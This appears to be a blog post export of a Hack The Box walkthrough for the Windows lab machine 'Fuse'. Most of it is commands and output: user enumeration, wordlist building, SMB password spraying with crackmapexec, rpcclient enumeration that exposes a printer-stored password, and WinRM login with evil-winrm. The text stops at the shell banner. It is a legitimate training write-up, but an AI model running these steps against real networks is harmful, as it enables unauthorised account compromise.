{"id":1572,"date":"2021-09-29T14:17:13","date_gmt":"2021-09-29T14:17:13","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1572"},"modified":"2021-09-29T14:17:13","modified_gmt":"2021-09-29T14:17:13","slug":"fuse","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/29\/fuse\/","title":{"rendered":"Fuse"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/256\" title=\"Fuse\">Fuse<\/a> - HTB<\/td>\n<td>Hard<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/7c69c876f496cd729a077277757d219d.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap scan:<\/p>\n<pre><code class=\"language-sh\">Not shown: 65514 filtered ports\nPORT      STATE SERVICE      VERSION\n53\/tcp    open  domain       Simple DNS Plus\n80\/tcp    open  http         Microsoft IIS httpd 10.0\n| http-methods:
                                                                                              \n|_  Potentially risky methods: TRACE                                                                                                                                                                                                          \n|_http-server-header: Microsoft-IIS\/10.0                                                                                                                                                                                                      \n|_http-title: Site doesn&#039;t have a title (text\/html).                                                                                                                                                                                          \n88\/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-28 19:33:25Z)                                                                                                                                                   \n135\/tcp   open  msrpc        Microsoft Windows RPC                                                                                                                                                                                            \n139\/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                                                                                                                                                                    \n389\/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)                                                                                                                 \n445\/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)                                                                                                                 
                          \n464\/tcp   open  kpasswd5?                                                                                                                                                                                                                     \n593\/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0                                                                                                                                                                              \n636\/tcp   open  tcpwrapped                                                                                                                                                                                                                    \n3268\/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)                                                                                                                 \n3269\/tcp  open  tcpwrapped\n5985\/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n9389\/tcp  open  mc-nmf       .NET Message Framing\n49666\/tcp open  msrpc        Microsoft Windows RPC\n49667\/tcp open  msrpc        Microsoft Windows RPC\n49675\/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n49676\/tcp open  msrpc        Microsoft Windows RPC\n49678\/tcp open  msrpc        Microsoft Windows RPC\n49703\/tcp open  msrpc        Microsoft Windows RPC\n49757\/tcp open  msrpc        Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)\nOS CPE: cpe:\/o:microsoft:windows_server_2016 cpe:\/o:microsoft:windows_server_2012:r2 cpe:\/o:microsoft:windows_server_2008:r2 cpe:\/o:microsoft:windows_10:1607\nAggressive OS guesses: Microsoft 
Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host: FUSE; OS: Windows; CPE: cpe:\/o:microsoft:windows\n<\/code><\/pre>\n<p>The machine is clearly a DC. There is also a web page on port 80, a page called PaperCut. Visiting this page, I saw printer logs from different dates, and using the user names found there I first tried an AS-REP roasting attack, but it was not successful. Here are the users I obtained:<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# cat printer_users\npmerton\ntlavel\nsthompson\nbhult\nadministrator\n<\/code><\/pre>\n<p>The page where I found some of these users: <a href=\"http:\/\/fuse.fabricorp.local\/papercut\/logs\/html\/papercut-print-log-2020-06-10.htm\">http:\/\/fuse.fabricorp.local\/papercut\/logs\/html\/papercut-print-log-2020-06-10.htm<\/a><\/p>\n<p>I investigated for a long time but found nothing, so I decided to try an SMB brute-force attempt. I first tried the fastcrack.txt file, but it was not successful. 
So I built a wordlist from the words on the web page.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# cewl -w wordlist --with-numbers -m 6 -d 3 http:\/\/fuse.fabricorp.local\/papercut\/logs\/html\/index.htm\n<\/code><\/pre>\n<p>Before that, I used the kerbrute tool to verify whether the users I had obtained actually exist.<\/p>\n<pre><code class=\"language-sh\">\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# .\/kerbrute_linux_amd64 userenum \/root\/10.10.10.193\/users -d fabricorp.local --dc 10.10.10.193\n\n    __             __               __     \n   \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,&lt; \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/\n\nVersion: v1.0.3 (9dad6e1) - 09\/28\/21 - Ronnie Flathers @ropnop\n\n2021\/09\/28 18:25:26 &gt;  Using KDC(s):\n2021\/09\/28 18:25:26 &gt;   10.10.10.193:88\n\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       sthompson@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       pmerton@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       tlavel@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       administrator@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       bhult@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  Done! 
Tested 5 usernames (5 valid) in 0.075 seconds\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]                                                                                       \n\u2514\u2500# crackmapexec smb 10.10.10.193 -u users -p wordlist                                                                 \nSMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)                                                                               \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:PaperCut STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LETTER STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:DUPLEX STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:GRAYSCALE STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Logger STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:papercut STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Notepad STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:sthompson STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LONWK019 STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Copies STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Printer STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE     
        [-] fabricorp.local\\pmerton:Document STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Client STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Duplex STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Grayscale STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Software STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Copyright STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Location STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:NotepadLETTER STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Language STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Height STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Refresh STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:printing STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:logging 
STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:International STATUS_LOGON_FAILURE     \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:pmerton STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Starter STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:bnielson STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:JUMP01 STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:tlavel STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Budget STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Meeting STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Minutes STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LONWK015 STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:backup STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:mountain STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:request STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Fabricorp01 STATUS_LOGON_FAILURE       \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:offsite STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:invocation STATUS_LOGON_FAILURE        \nSMB         
10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LAPTOP07 STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:administrator STATUS_LOGON_FAILURE     \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:program STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:additional STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:features STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:please STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Follow STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Twitter STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Forbidden STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Access STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:denied STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:listed STATUS_LOGON_FAILURE                                                                                                                                   \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:available STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:software STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:printers STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] 
fabricorp.local\\pmerton:locally STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:attached STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:system STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:consider STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:monitoring STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:servers STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:reporting STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:quotas STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:charging STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:secured STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:advanced STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:management STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:website STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Please STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:report STATUS_LOGON_FAILURE                                                                                                                                   \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:inaccurate 
STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:support STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:developers STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Developer STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:PaperCutDev STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Server STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:permission STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:directory STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:credentials STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:supplied STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:pdfLETTER STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:WordLETTER STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Untitled STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:PaperCut STATUS_LOGON_FAILURE\nSMB         10.10.10.193    
445    FUSE             [-] fabricorp.local\\tlavel:LETTER STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:DUPLEX STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:GRAYSCALE STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Logger STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:papercut STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Notepad STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:sthompson STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:LONWK019 STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Copies STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Printer STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Document STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Client STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Duplex STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Grayscale STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Software STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Copyright STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] 
fabricorp.local\\tlavel:Location STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:NotepadLETTER STATUS_LOGON_FAILURE      \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Language STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Height STATUS_LOGON_FAILURE                                                                                                                                    \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Refresh STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:printing STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:logging STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:International STATUS_LOGON_FAILURE      \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:pmerton STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Starter STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:bnielson STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:JUMP01 STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:tlavel STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Budget STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Meeting STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Minutes 
STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:LONWK015 STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:backup STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:mountain STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:request STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE <\/code><\/pre>\n<p>In the end I found a password.<\/p>\n<pre><code>tlavel:Fabricorp01<\/code><\/pre>\n<p>Because it said <code>STATUS_PASSWORD_MUST_CHANGE<\/code>, I changed the password.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# smbpasswd -r 10.10.10.193 -U tlavel\nOld SMB password:\nNew SMB password:\nRetype new SMB password:\nPassword changed for user tlavel on 10.10.10.193.<\/code><\/pre>\n<p>However, as a result of my tests I began to think there was a scheduled task inside, because the password kept being reset. 
Acting quickly, I tried to gather information with rpcclient.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt\/ldapdomaindump\/ldap]\n\u2514\u2500# rpcclient -U &quot;tlavel&quot; -p &#039;Password2&#039; 10.10.10.193\nEnter WORKGROUP\\tlavel&#039;s password:\nrpcclient $&gt; enumdomusers\nuser:[Administrator] rid:[0x1f4]\nuser:[Guest] rid:[0x1f5]\nuser:[krbtgt] rid:[0x1f6]\nuser:[DefaultAccount] rid:[0x1f7]\nuser:[svc-print] rid:[0x450]\nuser:[bnielson] rid:[0x451]\nuser:[sthompson] rid:[0x641]\nuser:[tlavel] rid:[0x642]\nuser:[pmerton] rid:[0x643]\nuser:[svc-scan] rid:[0x645]\nuser:[bhult] rid:[0x1bbd]\nuser:[dandrews] rid:[0x1bbe]\nuser:[mberbatov] rid:[0x1db1]\nuser:[astein] rid:[0x1db2]\nuser:[dmuir] rid:[0x1db3]\nrpcclient $&gt; queryuser  0x450\n        User Name   :   svc-print\n        Full Name   :
\n        Home Drive  :\n        Dir Drive   :\n        Profile Path:\n        Logon Script:\n        Description :\n        Workstations:\n        Comment     :\n        Remote Dial :\n        Logon Time               :      Tue, 28 Sep 2021 19:08:01 EDT\n        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST\n        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST\n        Password last set Time   :      Sat, 30 May 2020 20:27:08 EDT\n        Password can change Time :      Sun, 31 May 2020 20:27:08 EDT\n        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT\n        unknown_2[0..31]...\n        user_rid :      0x450\n        group_rid:      0x201\n        acb_info :      0x00000210\n        fields_present: 0x00ffffff\n        logon_divs:     168\n        bad_password_count:     0x00000000\n        logon_count:    0x00000077\n        
padding1[0..7]...                                                                                                                                                                                                                     \n        logon_hrs[0..21]...               \nrpcclient $&gt; querydispinfo                                                                                             \nindex: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer\/domain                                                                                                  \nindex: 0x109c RID: 0x1db2 acb: 0x00000210 Account: astein       Name: (null)    Desc: (null)                           \nindex: 0x1099 RID: 0x1bbd acb: 0x00020010 Account: bhult        Name: (null)    Desc: (null)                           \nindex: 0x1092 RID: 0x451 acb: 0x00020010 Account: bnielson      Name: (null)    Desc: (null)                           \nindex: 0x109a RID: 0x1bbe acb: 0x00000211 Account: dandrews     Name: (null)    Desc: (null)                          \nindex: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.                                                                                                                   
\nindex: 0x109d RID: 0x1db3 acb: 0x00000210 Account: dmuir        Name: (null)    Desc: (null)                           \nindex: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer\/domain                                                                                                        \nindex: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account  \nindex: 0x109b RID: 0x1db1 acb: 0x00000210 Account: mberbatov    Name: (null)    Desc: (null)                           \nindex: 0x1096 RID: 0x643 acb: 0x00000210 Account: pmerton       Name: (null)    Desc: (null)                           \nindex: 0x1094 RID: 0x641 acb: 0x00000210 Account: sthompson     Name: (null)    Desc: (null)                           \nindex: 0x1091 RID: 0x450 acb: 0x00000210 Account: svc-print     Name: (null)    Desc: (null)                           \nindex: 0x1098 RID: 0x645 acb: 0x00000210 Account: svc-scan      Name: (null)    Desc: (null)                           \nindex: 0x1095 RID: 0x642 acb: 0x00020010 Account: tlavel        Name: (null)    Desc: (null)                           \nrpcclient $&gt; queryuser  0x645\n        User Name   :   svc-scan\n        Full Name   :     \n        Home Drive  :      \n        Dir Drive   :    \n        Profile Path:       \n        Logon Script:        \n        Description :     \n        Workstations:    \n        Comment     :        \n        Remote Dial :            \n        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST                                                  \n        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST                                                  \n        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST                                                  \n        Password last set Time   :      Sat, 30 May 2020 20:27:31 EDT                       
\n        Password can change Time :      Sun, 31 May 2020 20:27:31 EDT\n        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT\n        unknown_2[0..31]...\n        user_rid :      0x645\n        group_rid:      0x201\n        acb_info :      0x00000210\n        fields_present: 0x00ffffff\n        logon_divs:     168\n        bad_password_count:     0x00000000\n        logon_count:    0x00000000\n        padding1[0..7]...\n        logon_hrs[0..21]...\nrpcclient $&gt; enumprinters\n        flags:[0x800000]\n        name:[\\\\10.10.10.193\\HP-MFT01]\n        description:[\\\\10.10.10.193\\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]\n        comment:[]\n<\/code><\/pre>\n<p>As can be seen, we obtained a password of the form <strong>$fab@s3Rv1ce$1<\/strong>. 
I tried this password against all users.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# cat users\nAdministrator\nGuest\nkrbtgt\nDefaultAccount\nsvc-print\nbnielson\nsthompson\ntlavel\npmerton\nsvc-scan\nbhult\ndandrews\nmberbatov\nastein\ndmuir\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# crackmapexec smb 10.10.10.193 -u users -p &#039;$fab@s3Rv1ce$1&#039;\nSMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\Administrator:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\Guest:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\krbtgt:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\DefaultAccount:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [+] fabricorp.local\\svc-print:$fab@s3Rv1ce$1 <\/code><\/pre>\n<p>Great! 
Let's check WinRM.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# crackmapexec winrm 10.10.10.193 -u svc-print -p &#039;$fab@s3Rv1ce$1&#039;\nWINRM       10.10.10.193    5985   FUSE             [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local)\nWINRM       10.10.10.193    5985   FUSE             [*] http:\/\/10.10.10.193:5985\/wsman\nWINRM       10.10.10.193    5985   FUSE             [+] fabricorp.local\\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)\n<\/code><\/pre>\n<p>We can now connect to the machine.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'\n\nEvil-WinRM shell v3.3\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
